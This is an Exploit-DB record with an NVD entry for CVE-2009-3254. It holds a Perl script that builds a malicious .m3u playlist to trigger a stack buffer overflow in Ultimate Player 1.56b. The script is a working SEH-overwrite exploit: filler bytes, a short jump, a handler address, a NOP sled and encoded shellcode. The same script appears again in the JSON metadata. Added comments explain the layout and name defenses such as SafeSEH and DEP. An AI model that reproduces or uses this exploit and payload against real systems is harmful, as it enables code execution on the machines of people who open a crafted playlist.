ID EDB-ID:9548
Type exploitdb
Reporter hack4love
Modified 2009-08-31T00:00:00
Description
Ultimate Player 1.56b (.m3u/.upl) universal local buffer overflow (BOF) exploit, SEH-based. CVE-2009-3254. Local exploit for the Windows platform.
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# Ultimate Player v 1.56 beta (.m3u/upl) Universal Local BOF SEH
#
# Purpose: builds one long byte string and writes it to HACK4LOVE.m3u (and to
# STDOUT). The advisory record on this page maps the issue to CVE-2009-3254:
# stack-based buffer overflows in Ultimate Player 1.56 beta reached through a
# long string in a .m3u or .upl playlist file (CWE-119).
#
# Layout of the generated data, in order:
#   $bof  4108 filler bytes
#   $nsh  4 bytes
#   $seh  4 bytes
#   $nop  20 bytes of 0x90
#   $sec  opaque payload bytes
#
# NOTE(defense): a playlist entry that is thousands of bytes of one repeated
# character followed by non-text bytes is not a plausible media path, so it is
# a usable signal when triaging .m3u/.upl files. The underlying fix is a length
# check in the player's playlist parser; no fixed version is named on this page.
#
# NOTE(review): the script has no `use strict; use warnings;`, so mistakes such
# as a failed open below produce no diagnostic.
####################################################################
# Filler: 4108 copies of 0x41 ('A'). The count is the author's; the page does
# not show how it was derived.
my $bof="\x41" x 4108;
# EB 06 is an x86 short jump over the next 6 bytes; 90 90 pads the value to
# 4 bytes. The variable name and the "(SEH)" in the title suggest this sits in
# the next-record slot of an exception registration record; that is inferred,
# not stated on the page.
my $nsh="\xEB\x06\x90\x90";
# 4-byte value, 0x72D115B8 when read little-endian. The name and title suggest
# it replaces an exception handler pointer; the page does not say which module
# the address belongs to.
# NOTE(defense): handler-pointer overwrites of this style are what SafeSEH,
# SEHOP and DEP are designed to stop; whether the affected build uses any of
# them is not shown here.
my $seh="\xb8\x15\xd1\x72";## author's note: tested under SP2/SP3 ("univ")
# 20 single-byte NOPs (0x90) placed between $seh and the payload.
my $nop="\x90" x 20;
# Opaque payload bytes, concatenated from the literals below. After a short
# non-printable prefix the bytes appear to be printable ASCII, which is
# consistent with an encoded payload; its behaviour is not documented on this
# page.
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
# Emits the full byte string on STDOUT in addition to the file written below.
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
# Opens HACK4LOVE.m3u for append and writes the same bytes to it.
# NOTE(review): bareword filehandle and two-argument open with the mode
# embedded in the string; the return value of open is not checked, so a failed
# open leaves the print below with nothing to write to and no error reported.
# '>>' appends, so the file grows on every run, and the handle is never
# explicitly closed.
open(myfile,'>> HACK4LOVE.m3u');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-08-31]
{"id": "EDB-ID:9548", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Ultimate Player 1.56b .m3u/upl Universal Local BoF Exploit SEH", "description": "Ultimate Player 1.56b (.m3u/upl) Universal Local BOF Exploit (SEH). CVE-2009-3254. Local exploit for windows platform", "published": "2009-08-31T00:00:00", "modified": "2009-08-31T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/9548/", "reporter": "hack4love", "references": [], "cvelist": ["CVE-2009-3254"], "lastseen": "2016-02-01T10:50:27", "viewCount": 7, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2016-02-01T10:50:27", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3254"]}], "modified": "2016-02-01T10:50:27", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://www.exploit-db.com/download/9548/", "sourceData": "#!/usr/bin/perl\n# by hack4love\n# hack4love@hotmail.com\n# Ultimate Player v 1.56 beta (.m3u/upl) Universal Local BOF SEH\n####################################################################\nmy $bof=\"\\x41\" x 4108;\nmy $nsh=\"\\xEB\\x06\\x90\\x90\";\nmy $seh=\"\\xb8\\x15\\xd1\\x72\";##tasted under sp2//sp3 univ\nmy $nop=\"\\x90\" x 20;\nmy 
$sec=\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\".\n\"\\x42\\x50\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x34\\x4e\\x43\\x4b\\x48\\x4e\\x47\".\n\"\\x45\\x30\\x4a\\x47\\x41\\x50\\x4f\\x4e\\x4b\\x48\\x4f\\x44\\x4a\\x41\\x4b\\x48\".\n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x58\\x46\\x43\\x4b\\x38\".\n\"\\x41\\x50\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\".\n\"\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\n\"\\x46\\x4f\\x4b\\x43\\x46\\x55\\x46\\x32\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\".\n\"\\x4f\\x35\\x46\\x32\\x41\\x30\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x30\\x4b\\x44\".\n\"\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x51\\x4b\\x48\".\n\"\\x41\\x50\\x4b\\x4e\\x49\\x58\\x4e\\x55\\x46\\x42\\x46\\x30\\x43\\x4c\\x41\\x33\".\n\"\\x42\\x4c\\x46\\x36\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x37\".\n\"\\x4e\\x30\\x4b\\x48\\x42\\x54\\x4e\\x30\\x4b\\x58\\x42\\x57\\x4e\\x51\\x4d\\x4a\".\n\"\\x4b\\x38\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x48\\x42\\x48\\x42\\x4b\".\n\"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x48\\x4a\\x56\\x4e\\x33\\x4f\\x35\\x41\\x53\".\n\"\\x48\\x4f\\x42\\x56\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x57\".\n\"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x55\\x4a\\x36\\x4a\\x59\".\n\"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x41\\x56\".\n\"\\x4e\\x56\\x43\\x46\\x42\\x30\\x5a\";\nprint $bof.$nsh.$seh.$nop.$sec;\n###################################################################\nopen(myfile,'>> 
HACK4LOVE.m3u');\nprint myfile $bof.$nsh.$seh.$nop.$sec;\n###################################################################\n\n# milw0rm.com [2009-08-31]\n", "osvdbidlist": ["58255"]}
{"cve": [{"lastseen": "2021-02-02T05:40:05", "description": "Multiple stack-based buffer overflows in Ultimate Player 1.56 beta allow remote attackers to execute arbitrary code via a long string in a (1) .m3u or (2) .upl playlist file.", "edition": 4, "cvss3": {}, "published": "2009-09-18T20:30:00", "title": "CVE-2009-3254", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3254"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:ultimatevideosite:ultimate_player:1.56"], "id": "CVE-2009-3254", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3254", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ultimatevideosite:ultimate_player:1.56:beta:*:*:*:*:*:*"]}]}